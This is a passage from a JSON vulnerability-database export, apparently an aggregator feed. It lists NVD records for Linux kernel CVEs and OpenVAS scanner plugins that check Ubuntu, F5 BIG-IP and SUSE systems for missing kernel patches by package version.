"CVE-2014-7822", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7822", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.15.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "Use-after-free vulnerability in the sctp_assoc_update function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows remote attackers to cause a denial of service (slab corruption and panic) or possibly have unspecified other impact by triggering an INIT collision that leads to improper handling of shared-key data.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 6, "cvss3": {}, "published": "2015-03-16T10:59:00", "title": "CVE-2015-1421", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1421"], "modified": "2018-01-05T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.7"], "id": "CVE-2015-1421", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1421", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.7:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:36:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822", "CVE-2015-1421", "CVE-2014-9683", "CVE-2014-9419"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-03-25T00:00:00", "id": "OPENVAS:1361412562310842146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842146", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-2542-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-2542-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842146\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-25 06:33:39 +0100 (Wed, 25 Mar 2015)\");\n script_cve_id(\"CVE-2014-7822\", \"CVE-2014-9419\", \"CVE-2014-9683\", \"CVE-2015-1421\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-2542-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Linux kernel's splice system call did\nnot correctly validate its parameters. A local, unprivileged user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the\ntask switching function in the Linux kernel for x86_64 based machines. A\nlocal user could exploit this flaw to bypass the Address Space Layout\nRadomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file\nname decoding. A local unprivileged user could exploit this flaw to cause a\ndenial of service (system crash) or potentially gain administrative\nprivileges. (CVE-2014-9683)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's SCTP\n(Stream Control Transmission Protocol) subsystem during INIT collisions. A\nremote attacker could exploit this flaw to cause a denial of service\n(system crash) or potentially escalate their privileges on the system.\n(CVE-2015-1421)\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2542-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2542-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1461-omap4\", ver:\"3.2.0-1461.81\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822", "CVE-2015-1421", "CVE-2014-9683", "CVE-2014-9419"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-03-25T00:00:00", "id": "OPENVAS:1361412562310842144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842144", "type": "openvas", "title": "Ubuntu Update for linux USN-2541-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2541-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842144\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-25 06:33:07 +0100 (Wed, 25 Mar 2015)\");\n script_cve_id(\"CVE-2014-7822\", \"CVE-2014-9419\", \"CVE-2014-9683\", \"CVE-2015-1421\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2541-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Linux kernel's splice system call did\nnot correctly validate its parameters. A local, unprivileged user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the\ntask switching function in the Linux kernel for x86_64 based machines. A\nlocal user could exploit this flaw to bypass the Address Space Layout\nRadomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file\nname decoding. A local unprivileged user could exploit this flaw to cause a\ndenial of service (system crash) or potentially gain administrative\nprivileges. (CVE-2014-9683)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's SCTP\n(Stream Control Transmission Protocol) subsystem during INIT collisions. A\nremote attacker could exploit this flaw to cause a denial of service\n(system crash) or potentially escalate their privileges on the system.\n(CVE-2015-1421)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2541-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2541-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-generic\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-generic-pae\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-highbank\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-omap\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-powerpc-smp\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-powerpc64-smp\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-79-virtual\", ver:\"3.2.0-79.115\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T18:45:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9419"], "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2015-11-09T00:00:00", "id": "OPENVAS:1361412562310105439", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105439", "type": "openvas", "title": "F5 BIG-IP - SOL17551 - Linux kernel vulnerability CVE-2014-9419", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL17551 - Linux kernel vulnerability CVE-2014-9419\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105439\");\n script_cve_id(\"CVE-2014-9419\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL17551 - Linux kernel vulnerability CVE-2014-9419\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/17000/500/sol17551.html\");\n\n script_tag(name:\"impact\", value:\"A local authenticated attacker may obtain sensitive information from kernel memory by using a specially crafted application.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The __switch_to function in arch/x86/kernel/process_64.c in the Linux kernel through 3.18.1 does not ensure that Thread Local Storage (TLS) descriptors are loaded before proceeding with other steps, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application that reads a TLS base address. (CVE-2014-9419)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-11-09 10:38:23 +0100 (Mon, 09 Nov 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.4.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.0.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:45:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1421"], "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2015-09-18T00:00:00", "id": "OPENVAS:1361412562310105356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105356", "type": "openvas", "title": "F5 BIG-IP - SOL17242 - Linux kernel SCTP vulnerability CVE-2015-1421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL17242 - Linux kernel SCTP vulnerability CVE-2015-1421\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105356\");\n script_cve_id(\"CVE-2015-1421\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL17242 - Linux kernel SCTP vulnerability CVE-2015-1421\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17242.html?sr=48315147\");\n\n script_tag(name:\"impact\", value:\"Remote attackers may be able to cause a denial-of-service (DoS) attack on an affected system by triggering an INIT collision in the Stream Control Transmission Protocol (SCTP). This vulnerability does not affect SCTP functionality on the data plane, but does affect the SCTP kernel module on the control plane for BIG-IP, BIG-IQ, and Enterprise Manager systems.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in the sctp_assoc_update function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows remote attackers to cause a denial of service (slab corruption and panic) or possibly have unspecified other impact by triggering an INIT collision that leads to improper handling of shared-key data. (CVE-2015-1421)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 14:09:09 +0200 (Fri, 18 Sep 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.4.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.0.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4692", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2014-9729", "CVE-2015-3212", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-4036", "CVE-2015-1805"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851080", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2015:1324-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851080\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:38:43 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-1805\", \"CVE-2015-3212\", \"CVE-2015-4036\", \"CVE-2015-4167\", \"CVE-2015-4692\", \"CVE-2015-5364\", \"CVE-2015-5366\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2015:1324-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 kernel was updated to 3.12.44 to receive\n various security and bugfixes.\n\n These features were added:\n\n - mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array support\n (bsc#854824).\n\n - mpt3sas: Bump mpt3sas driver version to 04.100.00.00 (bsc#854817).\n\n The following security bugs were fixed:\n\n - CVE-2015-1805: iov overrun for failed atomic copy could have lead to DoS\n or privilege escalation (bsc#933429).\n\n - CVE-2015-3212: A race condition in the way the Linux kernel handled\n lists of associations in SCTP sockets could have lead to list corruption\n and kernel panics (bsc#936502).\n\n - CVE-2015-4036: DoS via memory corruption in vhost/scsi driver\n (bsc#931988).\n\n - CVE-2015-4167: Linux kernel built with the UDF file\n system(CONFIG_UDF_FS) support was vulnerable to a crash. It occurred\n while fetching inode information from a corrupted/malicious udf file\n system image (bsc#933907).\n\n - CVE-2015-4692: DoS via NULL pointer dereference in kvm_apic_has_events\n function (bsc#935542).\n\n - CVE-2015-5364: Remote DoS via flood of UDP packets with invalid\n checksums (bsc#936831).\n\n - CVE-2015-5366: Remote DoS of EPOLLET epoll applications via flood of UDP\n packets with invalid checksums (bsc#936831).\n\n Security issues already fixed in the previous update but not referenced by\n CVE:\n\n - CVE-2014-9728: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n\n - CVE-2014-9729: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n\n - CVE-2014-9730: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n\n - CVE-2014-9731: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to information leakage (bsc#933896).\n\n The following non-security bugs were fixed:\n\n - ALSA: hda - add codec ID for Skylake display audio codec (bsc#936556).\n\n - ALSA: hda/hdmi - apply Haswell fix-ups to Skylake display codec\n (bsc#936556).\n\n - ALSA: hda_controller: Separate stream_tag for input and output streams\n (bsc#936556).\n\n - ALSA: hda_intel: add AZX_DCAPS_I915_POWERWELL for SKL and BSW\n (bsc#936556).\n\n - ALSA: hda_intel: apply the Separate stream_tag for Skylake (bsc#936556).\n\n - ALSA: hda_intel: apply the Separate stream_tag for Sunrise Point\n (bsc#936556).\n\n - Btrfs: Handle unaligned length in extent_same (bsc#937609).\n\n - Btrfs: add missing inode item update in fallocate() (bsc#938023).\n\n - Btrfs: check pending chunks when shrinking fs to avoid corruption\n ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1324-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n 